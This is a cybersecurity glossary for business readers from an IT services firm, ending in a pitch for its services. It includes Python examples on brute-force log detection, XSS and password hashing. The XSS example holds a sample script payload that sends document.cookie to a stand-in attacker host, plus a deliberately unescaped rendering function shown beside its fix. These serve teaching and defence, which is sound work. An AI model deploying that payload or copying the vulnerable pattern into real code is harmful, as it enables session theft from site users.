The Essential Cybersecurity Glossary: Key Terms for Business Leaders and Tech Professionals

Understanding cybersecurity is critical for protecting organisational assets, data, and reputation in the UK’s rapidly digitising business landscape. Cyber security measures are necessary to stay ahead of potential threats.
This comprehensive glossary breaks down essential cybersecurity terms in clear, accessible language, helping business leaders and technology professionals navigate the complex world of digital security.
Cybersecurity Terms Glossary
> Access Control
The system of ensuring only authorised users can access specific resources, like how a key card system controls who can enter different building areas.
> Advanced Encryption Standard (AES)
A symmetric block cipher, standardised by NIST in 2001, that encrypts data in 128-bit blocks using 128-, 192- or 256-bit keys. The same key both encrypts and decrypts, so protecting and distributing that key is the main practical challenge.
> Advanced Persistent Threat (APT)
A sophisticated, prolonged cyberattack where an unauthorised user gains and maintains undetected access to a network, often targeting specific organisations for extended periods of data extraction or system compromise.
> Anomaly Detection
The process of identifying unusual patterns or behaviours in systems and data that might indicate a security threat.
> Anti-virus Software
Software that scans your computer for malicious programs and suspicious behaviour, then quarantines or removes threats while providing real-time protection.
> Application Security (AppSec)
The practice of adding security features and testing software applications from development to deployment to protect them from cyberattacks and unauthorised access.
> Attack Surface
The total collection of points where an unauthorised user could potentially enter IT systems, including hardware, software, and network vulnerabilities.
> Authentication
The process of verifying the identity of a user, system, or application via passwords, biometrics or multi-factor authentication methods before allowing access to data, systems, resources, etc.
> Backup
A copy of digital data stored separately from the original source, enabling recovery in case of data loss, system failure, or cyberattack.
> Blue Team
A group of cyber security professionals who protect an organisation’s systems by monitoring networks, implementing controls, and actively defending against attacks.
> Botnet
A network of compromised computers or devices infected with malware, controlled remotely by cybercriminals to perform coordinated malicious activities like distributed denial-of-service (DDoS) attacks.
> Bring Your Own Device (BYOD)
A policy that allows employees to use personal devices such as mobiles, laptops and tablets for work purposes.
> Brute Force Attack
When attackers use automated tools to systematically try large numbers of candidate passwords, keys or other credentials until one works, in order to gain unauthorised access to an account or to decrypt protected data. Rate limiting, account lockout and multi-factor authentication are the usual countermeasures.
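How a defender would actually spot this in logs, as an added Python example written for this glossary rather than code from the original page: it parses a few constructed OpenSSH-style auth.log lines (hosts, IPs, usernames and timestamps are all invented), flags any source address with five or more failed logins inside a five-minute window, and records whether a successful login followed the burst, which is the case to treat as a probable account compromise. The thresholds and function names are choices made for the illustration. The same logic is a concrete instance of the Anomaly Detection entry above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed OpenSSH-style auth.log lines (invented host, IPs and users; not real data).
SAMPLE_LOG = """\
Mar 10 09:12:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51012 ssh2
Mar 10 09:12:02 host sshd[1201]: Failed password for invalid user root from 203.0.113.7 port 51013 ssh2
Mar 10 09:12:03 host sshd[1201]: Failed password for invalid user test from 203.0.113.7 port 51014 ssh2
Mar 10 09:12:04 host sshd[1201]: Failed password for invalid user oracle from 203.0.113.7 port 51015 ssh2
Mar 10 09:12:05 host sshd[1201]: Failed password for alice from 203.0.113.7 port 51016 ssh2
Mar 10 09:12:06 host sshd[1201]: Accepted password for alice from 203.0.113.7 port 51017 ssh2
Mar 10 09:30:00 host sshd[1300]: Failed password for bob from 198.51.100.2 port 40000 ssh2
Mar 10 09:31:00 host sshd[1301]: Accepted password for bob from 198.51.100.2 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line, year=2024):
    """Parse one sshd line into an event dict, or None if it is not a login result."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; assume one so times can be compared.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_brute_force(log_text, threshold=5, window=timedelta(minutes=5)):
    """Flag source IPs with >= threshold failed logins inside a sliding time window.

    Returns {ip: {"failures", "users", "success_after", "success_user"}}.
    success_after=True means a successful login from that IP followed the burst:
    the signal a SOC should escalate as a probable account compromise.
    """
    events_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            events_by_ip[ev["ip"]].append(ev)

    alerts = {}
    for ip, events in events_by_ip.items():
        events.sort(key=lambda e: e["ts"])
        recent = []  # (timestamp, user) of failures still inside the window
        for ev in events:
            if ev["result"] == "Failed":
                recent.append((ev["ts"], ev["user"]))
                recent = [(t, u) for t, u in recent if ev["ts"] - t <= window]
                if len(recent) >= threshold and ip not in alerts:
                    alerts[ip] = {
                        "failures": len(recent),
                        "users": sorted({u for _, u in recent}),
                        "success_after": False,
                        "success_user": None,
                    }
            elif ip in alerts:  # an Accepted login after the burst
                alerts[ip]["success_after"] = True
                alerts[ip]["success_user"] = ev["user"]
    return alerts


if __name__ == "__main__":
    for ip, info in detect_brute_force(SAMPLE_LOG).items():
        print(ip, info)
```

On the sample data only 203.0.113.7 is flagged: five failures in five seconds across five different usernames, then an accepted login for alice. The single failure from 198.51.100.2 never reaches the threshold, which is the point of a windowed count rather than alerting on every failed password.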
> Business Email Compromise (BEC)
A sophisticated email scam where attackers impersonate legitimate business contacts to trick employees into transferring funds or sharing sensitive information, often resulting in significant financial losses.
> Cloud Security
Protective measures and policies designed to safeguard cloud computing environments, including data, applications, and infrastructure.
> Command and Control (C2)
The systems and infrastructure hackers use to communicate with and control compromised computers.
> Cross-Site Scripting (XSS)
An attack in which attacker-supplied script is injected into an otherwise trusted website or application so that it runs in other users' browsers with that site's privileges, typically to steal session cookies, capture credentials or perform actions as the victim. The root cause is almost always untrusted input rendered into a page without proper output encoding.
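The vulnerable pattern beside its fix, as an added Python example written for this glossary (not code from the original page): a greeting rendered by naive string formatting, the same greeting with output encoded for the HTML text context, and a link where the attribute and the URL scheme each need their own handling. The payload, function names and attacker domain are invented for the illustration.

```python
import html

# Constructed attacker-controlled input (an invented payload, not from a real incident).
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_greeting_vulnerable(name):
    # VULNERABLE: untrusted input is dropped straight into the HTML body, so a
    # <script> payload executes in every visitor's browser under the site's origin.
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_safe(name):
    # Fix: encode for the HTML text context. html.escape turns & < > " ' into
    # entities, so the browser renders the input as text and never parses it as markup.
    return f"<p>Welcome back, {html.escape(name)}!</p>"


def render_profile_link_safe(display_name, url):
    # Attribute context: escaping quotes stops the value breaking out of href="...".
    # Escaping alone cannot stop a javascript: URL, which is perfectly valid attribute
    # text, so the scheme is also checked against an allow-list.
    url = url.strip()
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return f'<a href="{html.escape(url)}">{html.escape(display_name)}</a>'
```

Encoding must match the context the data lands in (HTML body, attribute, URL, JavaScript); a template engine that auto-escapes by default does this for you, but the scheme check on user-supplied links still has to be done deliberately.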
> Cryptography
The practice of securing communication and information through codes and encryption techniques, protecting data from unauthorised access or manipulation.
> Cyberattack
Any malicious act intended to disrupt, damage, steal, or gain unauthorised access to computer systems, networks, and devices.
> Data Breach
An incident where sensitive, protected, or confidential information is accessed, stolen, or released by unauthorised individuals, potentially compromising organisational or personal data.
> Data Loss Prevention (DLP)
Tools and processes that detect and block sensitive data leaving an organisation’s control without authorisation, whether by email, web upload, removable media or cloud sync.
> Deepfake
Artificially created videos, images, or audio that use artificial intelligence to make fake content appear real.
> Denial of Service (DoS)
An attack from a single source to disrupt normal server, website, or network traffic by overwhelming the target with a flood of internet traffic to make it unavailable to users. See also DDoS, where multiple malicious sources are used.
> Digital Forensics
The process of collecting and analysing digital evidence after a security incident to understand what happened and establish responsibility while maintaining legal standards.
> Distributed Denial of Service (DDoS) Attack
An attack from multiple sources to disrupt the normal server, website, or network traffic by overwhelming the target or its surrounding infrastructure with a flood of internet traffic to make it unavailable to users.
> Encryption
The process of converting readable data (plaintext) into an unreadable form (ciphertext) using an algorithm and a key, so that it cannot be read or altered undetected without the correct decryption key.
> Endpoint Detection and Response (EDR)
Security software that monitors and responds to suspicious activities on end-user devices like laptops, desktops, servers and phones.
> Exploit
A piece of software, crafted data or sequence of commands that takes advantage of a vulnerability in an application or system to cause unintended behaviour, such as running attacker-controlled code or gaining unauthorised access.
> Extended Detection and Response (XDR)
A security platform that integrates and correlates telemetry from multiple sources (endpoints, network, cloud, email and identity systems) to detect and respond to threats that no single tool would see on its own.
> Firewall
A security system that oversees network traffic, blocking potentially harmful activity to create a barrier between trusted internal systems and untrusted external ones.
> Governance, Risk, and Compliance (GRC)
A strategic approach to aligning IT with business objectives while effectively managing risks and meeting regulatory requirements.
> Hacking
The practice of manipulating computer systems, networks, or applications to gain unauthorised access, often with malicious intent to steal data or disrupt operations.
> Hashing
A one-way process that converts data of any size into a fixed-size value (a hash or digest) that serves as a digital fingerprint for verifying data integrity. A good hash function is practically impossible to reverse or to collide, which is why hashes are also used to store passwords; passwords, however, must be hashed with a random salt and a deliberately slow algorithm (e.g. PBKDF2, bcrypt or Argon2), never a plain fast hash.
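Both uses side by side, as an added Python example written for this glossary (not code from the original page): a SHA-256 fingerprint for integrity checking, and password storage with PBKDF2-HMAC-SHA256, a random per-user salt and a constant-time comparison on verification. The storage format, iteration count and function names are choices made for the illustration.

```python
import hashlib
import hmac
import os


def file_fingerprint(data: bytes) -> str:
    """SHA-256 digest as a hex fingerprint: any change to the input changes the value."""
    return hashlib.sha256(data).hexdigest()


# Password storage: never keep the raw password or a fast, unsalted hash of it.
# A random per-user salt defeats precomputed (rainbow-table) attacks, and a high
# iteration count makes each offline guess expensive for an attacker who steals the table.
ITERATIONS = 600_000  # illustrative value for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt=None) -> str:
    """Return a self-describing record: algorithm$iterations$salt_hex$hash_hex."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    # compare_digest avoids leaking how many leading bytes matched via response timing.
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(file_fingerprint(b"abc"))
    record = hash_password("correct horse battery staple")
    print(record, verify_password("correct horse battery staple", record))
```

Storing the iteration count with each record lets you raise it later and re-hash users at their next login without a flag day; the integrity fingerprint, by contrast, needs no salt or slowdown because there is no secret to guess.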
> Identity and Access Management (IAM)
A framework of policies and technologies ensuring that only authorised individuals access specific resources and data within an organisation’s digital ecosystem.
> Incident Response
A structured approach to addressing and managing the aftermath of a security breach or cyberattack to minimise damage and recovery time.
> Insider Threat
A security risk from within an organisation involving current or former employees or contractors who misuse their authorised access to compromise an organisation’s security—this act can be intentional or unintentional.
> Keylogger
Malicious software that records every keystroke made on a computer to steal passwords and other sensitive information.
> Malware
Malicious software designed to damage, disrupt, or gain unauthorised access to computer systems, including viruses, ransomware, spyware, and trojans.
> Man-in-the-Middle (MITM) Attack
When an attacker secretly intercepts, and possibly alters, communications between two parties (for example a user and an application) who believe they are talking directly to each other, in order to steal sensitive data or carry out other malicious activity. Properly validated TLS is the main defence.
> Multi-Factor Authentication (MFA)
A security mechanism requiring users to provide two or more verification methods to gain access to a system, significantly reducing the risk of unauthorised entry.
> Network Security
The practice of protecting computer networks and their data from unauthorised access, misuse, malfunction, modification, destruction, or improper disclosure.
> Network Segmentation
The process of dividing a network into smaller, isolated sub-networks so that a compromise in one segment cannot spread freely to others (limiting lateral movement), while also improving performance and manageability.
> Patch Management
The process of identifying, testing and applying software updates (patches) promptly to fix security vulnerabilities and bugs, prioritised by severity and by how exposed the affected systems are.
> Penetration Testing
An authorised simulated cyberattack performed to evaluate the security of an information system by identifying vulnerabilities that malicious actors could exploit.
> Phishing
A cybercrime technique where attackers pose as trustworthy entities, most often via email but also via SMS (smishing), phone calls (vishing) or messaging apps, to deceive individuals into disclosing sensitive information like passwords or card details, or into opening a malicious link or attachment.
> Public Key Infrastructure (PKI)
The set of policies, roles and systems for issuing, managing and revoking digital certificates that bind public keys to identities. Certificate authorities (CAs) sign the certificates, and browsers and operating systems ship with a trust store of root CAs, which is how a browser decides whether to trust a website’s TLS certificate.
> Ransomware
Malicious software that prevents user access to computers and data, usually by encryption – cybercriminals then demand a ransom for their restoration and may also steal or threaten to leak data.
> Red Team
A group of cybersecurity professionals that conducts authorised, simulated cyberattacks to test an organisation’s security defences and identify vulnerabilities.
> Remote Access Trojan (RAT)
Malicious software that allows attackers to gain unauthorised remote control of a computer to enable activities such as keylogging and file access.
> Sandboxing
A security practice of running suspicious programs in an isolated environment to observe and analyse them without risking harm to the system.
> Secure Sockets Layer (SSL) / Transport Layer Security (TLS)
Cryptographic protocols that encrypt and authenticate communications over a network, most visibly web traffic (HTTPS) but also email, VPNs and video conferencing. SSL is the deprecated predecessor of TLS; modern systems should use TLS 1.2 or 1.3, although the phrase "SSL certificate" is still used loosely.
> Security Awareness Training
Programs that teach employees about security risks and best practices to help them recognise and appropriately respond to potential threats – leading to better protection for organisations against cyber attacks.
> Security Information and Event Management (SIEM)
A security platform that collects log and event data from across an organisation’s IT infrastructure (servers, endpoints, firewalls, cloud services, identity systems), normalises and correlates it, and raises alerts on suspicious activity so that SOC analysts can investigate and respond.
> Security Operations Center (SOC)
A centralised team and facility within a business where specialised security staff monitor, detect, investigate and respond to cyber threats and incidents, including malware infections, phishing campaigns and compromised accounts.
> Social Engineering
Manipulating people rather than technology, by impersonation, urgency or persuasion, into revealing information or taking actions that compromise security; phishing and business email compromise are common forms.
> Spoofing
A technique cybercriminals use to disguise a communication to look like it’s coming from a trusted source.
> Spyware
Malicious software that is covertly installed on a computing device, designed to gather information about a person or organisation without their knowledge.
> Supply Chain Attack
A cyberattack that reaches a target organisation through a weaker link in its supply network, e.g. a third-party contractor with poor security controls, a compromised software update or a malicious open-source component.
> Threat Actor
A broad term for an individual, group or organisation that carries out, or intends to carry out, cyberattacks or other malicious activity against digital systems and devices, including cybercriminals, state-sponsored groups, hacktivists and malicious insiders.
> Threat Hunting
The practice of proactively searching through IT networks to detect and isolate advanced threats.
> Time-based One-Time Password (TOTP)
A temporary authentication code derived from a shared secret and the current time, valid only for a short window (usually 30 seconds) before a new code replaces it. Used as a second factor in multi-factor authentication, typically via an authenticator app.
> Trojan Horse
Malicious software, or malware, disguised as legitimate software, used to gain access to the user’s system – typically disguised in free-to-download files and email attachments.
> Virtual Private Network (VPN)
A service that creates a secure, encrypted connection between a user’s device and a remote network, protecting data transmission and ensuring privacy.
> Virus
A type of malware that attaches itself to legitimate programs or files and spreads between devices and networks by self-replicating when those files are run or shared, commonly via email attachments, downloads, unpatched software, fake websites and malicious adverts.
> Web Application Firewall (WAF)
A security tool that specifically protects web applications by filtering and monitoring HTTP traffic, blocking anything malicious.
> Zero Trust Security
A security model that trusts no user, device or network location by default and requires every access request to be authenticated, authorised and continuously verified against policy, whether it originates inside or outside the corporate network ("never trust, always verify").
Understanding Cybersecurity
While these technical terms might seem overwhelming, the key takeaway for business owners is simple: cybersecurity isn’t optional in today’s digital world.
Your business data, customer information, and operations are valuable assets that need protection. The most important step isn’t memorising these terms or becoming a security expert yourself – it’s recognising that professional cybersecurity support is as essential to your business as accounting or human resources.
Dr Logic’s cybersecurity services provide the expert protection your business needs, handling the technical complexities while you focus on running your business.
Our team stays ahead of emerging threats, implements comprehensive security measures, and provides 24/7 monitoring to keep your business safe. Contact us to discuss how we can protect your business’s digital assets and give you peace of mind.